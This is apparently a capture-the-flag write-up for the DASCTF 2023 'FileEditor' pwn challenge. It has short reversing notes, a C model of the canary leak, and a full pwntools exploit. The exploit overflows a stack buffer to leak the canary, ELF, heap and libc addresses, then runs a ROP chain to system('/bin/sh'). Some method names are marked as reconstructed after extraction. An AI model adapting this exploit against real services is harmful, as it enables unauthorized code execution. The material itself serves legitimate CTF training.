
DASCTF 2023 & 0X401 July Summer Challenge [PWN] (FileEditor Chapter)

Posted 2024-07-24 16:41:35 (495 views)


Binary protections: everything enabled (full protection).

64-bit binary, reversed in IDA.

The program simulates a vim-like editor: it opens a file, prints its contents, inserts, deletes, copies and edits lines, finds and replaces characters, and then saves and exits.

Let's analyze them one by one.

1. Open file

Opens the given file; if it does not exist, it is created.

2. Print contents

Nothing special: prints the file's contents.

3. Insert lines

Enter n and m, then the content: m lines are inserted before line n.

4. Delete lines

Again enter n and m; this deletes n lines starting from line m.

5. Copy lines

Copies m lines starting at line k to line n.

6. Edit line

Enter the line number to edit, then the new content.

7. Find characters

Our input is first copied into src, a buffer of 0x70 bytes.

8. Replace characters

Same as find.

9. Save and exit

0. Exit editing

Analysis: the find and replace functions copy our input onto the stack. Sending 0x68+1 bytes overwrites the null byte that terminates the canary, so when the content is printed the canary comes out with it. The same trick leaks a libc address and a heap address (the heap leak is optional, since the /bin/sh string inside libc can be used directly). Finally, an edit writes the ROP chain onto the stack, and the overflow in find hijacks control flow to get a shell.
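To make the leak in this analysis concrete, here is an added C model (not the challenge binary's source, whose real frame layout is unknown) of a frame with a 0x68-byte input buffer directly below the canary: a single newline landing on the canary's low byte lets a NUL-terminated print run into the canary, while a bounded read with explicit termination stops inside the buffer. The struct layout, function names and sample values are constructed assumptions.

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical frame of the edit routine as the writeup describes it: a
 * 0x68-byte input buffer directly below the canary, then saved rbp and the
 * return address. Layout, names and values are constructed for this model. */
struct frame {
    unsigned char buf[0x68];
    uint64_t canary;     /* glibc keeps the canary's low byte 0x00 */
    uint64_t saved_rbp;
    uint64_t ret_addr;
};

/* Unbounded edit: stores every byte received, like the overflow the writeup uses. */
static void edit_unbounded(struct frame *f, const unsigned char *in, size_t n) {
    if (n > sizeof *f) n = sizeof *f;          /* keep the model itself in bounds */
    memcpy((unsigned char *)f, in, n);
}

/* Hardened edit: never writes past buf and always leaves a NUL terminator. */
static void edit_bounded(struct frame *f, const unsigned char *in, size_t n) {
    if (n > sizeof f->buf - 1) n = sizeof f->buf - 1;
    memcpy(f->buf, in, n);
    f->buf[n] = '\0';
}

/* Bytes a strcpy/puts of buf would disclose: everything up to the first NUL
 * anywhere in the frame. */
static size_t disclosed_len(const struct frame *f) {
    const unsigned char *p = (const unsigned char *)f;
    size_t i = 0;
    while (i < sizeof *f && p[i] != '\0') i++;
    return i;
}

/* Feeds the writeup's input (0x68 bytes plus the newline that lands on the
 * canary's low byte) and returns how many bytes a following print would show. */
size_t leak_len(int hardened) {
    struct frame f;
    unsigned char in[0x69];
    memset(&f, 0, sizeof f);
    f.canary = 0x1122334455667700ULL;   /* constructed sample values, not real */
    f.saved_rbp = 0x00007ffc12345600ULL;
    f.ret_addr = 0x0000563412341ab0ULL;
    memset(in, 'a', 0x68); in[0x68] = '\n';
    if (hardened) edit_bounded(&f, in, sizeof in);
    else          edit_unbounded(&f, in, sizeof in);
    return disclosed_len(&f);   /* 0x70 unbounded (7 canary bytes shown), 0x67 bounded */
}
```

The unbounded path discloses 0x70 bytes (the buffer plus seven canary bytes, stopping only at the first zero byte of saved rbp), which is exactly why the exploit below reads 8 bytes after 104 characters and subtracts the newline; the bounded path discloses 0x67 bytes and nothing else.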

exp:

from pwn import *
context(log_level='debug', arch='amd64', os='linux')

io = process('./FileEditor')
#io = remote('', 27825)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

# The io.* method names and libc.* helpers were lost in extraction; they are
# reconstructed here from the program prompts and standard pwntools usage.

def open_file():
    io.sendlineafter('> choose:', '1')


def insert(n, m, msg):
    io.sendlineafter('> choose:', '3')
    io.sendlineafter('> To insert m lines before line n, please enter n m:', n)
    io.sendline(m)
    io.sendlineafter('> Please enter the content to be inserted in sequence:', msg)


def show():
    io.sendlineafter('> choose:', '2')


def edit(num, msg):
    io.sendlineafter('> choose:', '6')
    io.sendlineafter('> Please enter the line number to be modified:', num)
    io.sendlineafter('> Please enter the new content:', msg)

def find(string):
    io.sendlineafter('> choose:', '7')
    io.sendlineafter('> Please enter the string to search for:', string)
    io.sendlineafter('> Do you want to continue searching? (y/n)', 'n')

#gdb.attach(io)
open_file()
# 0x68 bytes of content; the newline appended by sendline lands on the
# canary's low (zero) byte, so a later print runs straight into the canary
payload = b'b' + b'a'*(0x68-1)
#gdb.attach(io)
insert('1', '1', payload)
io.send('\n')          # empty line ends the insertion
find('b')
edit('1', payload)
io.send('\n')
show()
io.recvuntil(b'a'*103)
canary = u64(io.recv(8)) - 0xa     # strip the newline byte to restore the low 0x00
success('canary---->' + hex(canary))

# keep the canary value intact but non-null (low byte 'a') so the copy runs
# past it into saved rbp ('c'*8) and then the return address, which is leaked
payload = b'b' + b'a'*(0x68-1) + p64(canary + ord('a')) + b'c'*8
edit('1', payload)
io.send('\n')
#gdb.attach(io)
sleep(0.5)
show()
io.recvuntil(b'c'*8)
elf_base = u64(io.recv(6).ljust(8, b'\x00')) - (0x59640d98850a - 0x59640d987000)
success('elf_base----->' + hex(elf_base))

payload = b'b' + b'a'*(0x68-1) + p64(canary + ord('a')) + b'c'*24 + b'd'*8
edit('1', payload)
io.send('\n')
sleep(0.5)
show()
io.recvuntil(b'd'*8)
heap = u64(io.recv(6).ljust(8, b'\x00')) - (0x5ab985b9d2a0 - 0x5ab985b9d000) + 0x96
success('heap----->' + hex(heap))

payload = b'b' + b'a'*(0x68-1) + p64(canary + ord('a')) + b'c'*48 + b'd'*8
edit('1', payload)
io.send('\n')
sleep(0.5)
#gdb.attach(io)
show()

io.recvuntil(b'd'*8)
libc_base = u64(io.recv(6).ljust(8, b'\x00')) - (0x796487e29d90 - 0x796487e28000) + 0x86 - 0x28000
success('libc_base---->' + hex(libc_base))
pause()
pop_rdi = elf_base + 0x0000000000002ac3 #: pop rdi ; ret
pop_rsi = elf_base + 0x0000000000002ac1 #: pop rsi ; pop r15 ; ret
ret = elf_base + 0x000000000000101a #: ret
system = libc_base + libc.sym['system'] # -0x28000
binsh = libc_base + next(libc.search(b'/bin/sh\0'))

#payload = b'b'+b'a'*(0x68-1) + p64(canary) + b'/bin/sh\x00' + p64(ret)
#payload += p64(pop_rdi) + p64(heap + 0x15e4) + p64(system)
# real canary this time (low byte 0x00), then a fake saved rbp and the ROP chain
payload = b'b' + b'a'*(0x68-1) + p64(canary) + p64(0xdeadbeef) + p64(ret) + p64(pop_rdi) + p64(binsh) + p64(system)

#gdb.attach(io)
edit('1', payload)
io.send('\n')
sleep(0.5)
#gdb.attach(io)
find('b')

io.interactive()